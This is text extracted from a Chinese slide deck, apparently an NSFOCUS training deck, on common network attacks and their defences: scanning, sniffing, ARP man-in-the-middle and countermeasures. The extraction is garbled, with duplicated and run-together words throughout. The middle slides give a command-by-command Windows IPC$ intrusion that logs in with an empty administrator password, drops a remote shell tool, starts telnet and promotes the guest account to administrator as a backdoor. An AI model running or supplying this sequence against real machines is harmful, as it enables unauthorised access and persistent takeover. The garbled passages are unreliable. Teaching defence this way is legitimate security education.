绿盟常见网络攻击与防范优质PPT.ppt

1、诱使用户访问纂改过的网页l电子邮件攻击：邮件炸弹、邮件欺骗l网络监听：获取明文传输的敏感信息l通过一个节点来攻击其他节点：攻击者控制一台主机后，经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据l拒绝服务攻击和分布式拒绝服务攻击（D.o.S和D.D.o.S）IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。获取信息获取信息1.1.1.1.收集主机信息收集主机信息收集主机信息收集主机信息Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rus

2、ers命令收集用户信息 Host或者Nslookup命令，结合Whois和Finger命令获取主机、操作系统和用户等信息 应用的方法：应用的方法：获取网络服务的端口作为入侵通道。2.2.端口扫瞄端口扫瞄1.TCP Connect（）2.TCP SYN3.TCP FIN4.IP段扫瞄5.TCP反向Ident扫瞄6.FTP代理扫瞄7.UDP ICMP不到达扫瞄7种扫瞄类型：种扫瞄类型：1.NSS（网络安全扫描器），可执行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。2.Strobe（超级优化TCP端口检测程序），可记录指定机器上的所有开放端口，快速

3、识别指定机器上运行的服务，提示可以被攻击的服务。3.SATAN（安全管理员的网络分析工具），SATAN用于扫描远程主机，发现漏洞，包括FTPD漏洞和可写的FTP目录，NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。4.Jakal扫描器，可启动而不完成TCP连接，因此可以扫描一个区域而不留下痕迹。5.IdengTCPscan扫描器，可识别指定TCP端口的进程的UID。扫瞄软件举例：3.Sniffer3.Sniffer3.Sniffer3.Sniffer扫瞄扫瞄扫瞄扫瞄原理：原理：sniffer类的软件能把本地网卡设置成工作在类的软件能把本地网卡设置成工作在“混杂混杂”（pr

4、omiscuous）方式，使该网卡能接收所）方式，使该网卡能接收所有数据帧，从而获取别人的口令、金融帐号或其他有数据帧，从而获取别人的口令、金融帐号或其他敏感机密信息等。敏感机密信息等。方法与对策：1 1、用交换机替换用交换机替换HUB，交换机是两两接通，比普，交换机是两两接通，比普通通HUB安全。安全。2 2、使用检测的软件，如、使用检测的软件，如CPM Antisniff等，检测网等，检测网络中是否有网卡工作在混杂状态（基本原理是发送络中是否有网卡工作在混杂状态（基本原理是发送本网中并不存在的本网中并不存在的MAC地址，看看是否有回应，如地址，看看是否有回应，如有回应，则说明有计算机网卡工

5、作在混杂模式。）。有回应，则说明有计算机网卡工作在混杂模式。一次利用一次利用ipc$ipc$的入侵过程的入侵过程l1.C:netusex.x.x.xIPC$“”/user:“admintitrators”用流光扫到的用户名是administrators，密码为“空”的IP地址l2.C:copysrv.exex.x.x.xadmin$先复制srv.exe上去，在流光的Tools目录下l3.C:nettimex.x.x.x查查时间，发现x.x.x.x的当前时间是2003/3/19上午11:00，命令成功完成。4.C:atx.x.x.x11:05srv.exe用at命令启动srv.exe吧（这里设置

6、的时间要比主机时间推后）5.C:nettimex.x.x.x再查查时间到了没有，如果x.x.x.x的当前时间是2003/3/19上午11:05，那就准备开始下面的命令。6.C:telnetx.x.x.x99这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了一次利用一次利用ipc$ipc$的入侵过程的入侵过程l7.C:copyntlm.exe127.0.0.1admin

7、$ntlm.exe也在流光的Tools目录中8.C:WINNTsystem32ntlm输入ntlm启动（这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“netstarttelnet”来开启Telnet服务）9.Telnetx.x.x.x，接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组10.C:netuserguest/active:yes11.C:netuserguest1234将Guest的密码改为123412.C:netlocalgroupadministratorsguest/add将Gues

8、t变为Administrator网络监听及防范技术网络监听及防范技术l网络窃听是指通过截获他人网络上通信的数据流，并非法从中提取重要信息的一种方法l间接性利用现有网络协议的一些漏洞来实现，不直接对受害主机系统的整体性进行任何操作或破坏l隐蔽性网络窃听只对受害主机发出的数据流进行操作，不与主机交换信息，也不影响受害主机的正常通信网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下l共享式局域网采用的是广播信道，每一台主机所发出的帧都会被全网内所有主机接收到l一般网卡具有以下四种工作模式：广播模式、多播模式、直接模式和混杂模式l网卡的缺省工作模式是广播模式和直接模式，即只接收发给自己的

9、和广播的帧网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下l使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地址，则提交给上层处理程序，否则丢弃此数据l当网卡工作于混杂模式的时候，它不做任何判断，直接将接收到的所有帧提交给上层处理程序l共享式网络下窃听就使用网卡的混杂模式 网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下l在数据链路层，数据帧的目的地址是以网卡的MAC地址来标识lARP协议实现的配对寻址 lARP请求包是以广播的形式发出，正常情况下只有正确IP地址与的主机才会发出

10、ARP响应包，告知查询主机自己的MAC地址。l局域网中每台主机都维护着一张ARP表，其中存放着地址对。网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下ARP改向的中间人窃听A A发往发往B B：（MACb（MACb，MACaMACa，PROTOCOLPROTOCOL，DATA）DATA）B B发往发往A A：（MACa（MACa，MACbMACb，PROTOCOLPROTOCOL，DATA）DATA）A A发往发往B B：（MACx（MACx，MACaMACa，PROTOCOLPROTOCOL，DATA）DATA）B B发往发往A A：（MACx（MACx，MACbMACb，P

11、ROTOCOLPROTOCOL，DATA）DATA）网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下lX分别向A和B发送ARP包，促使其修改ARP表l主机A的ARP表中B为l主机B的ARP表中A为lX成为主机A和主机B之间的“中间人”网络监听及防范技术网络监听及防范技术网络窃听的被动防范网络窃听的被动防范 l分割网段细化网络会使得局域网中被窃听的可能性减小 l使用静态ARP表手工输入地址对 l采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖，而采用基于IP地址的交换l加密SSH、SSL、IPSec网络监听及防范技术网络监听及防范技术网络窃听的主动防范网络窃听的主动防范共享式局域网下的主动防范措施l伪造数据包构造一个含有正确目标IP地址和一个不存在目标MAC地址各个操作系统处理方式不同，一个比较好的MAC地址是FF-FF-FF-FF-FF-FEl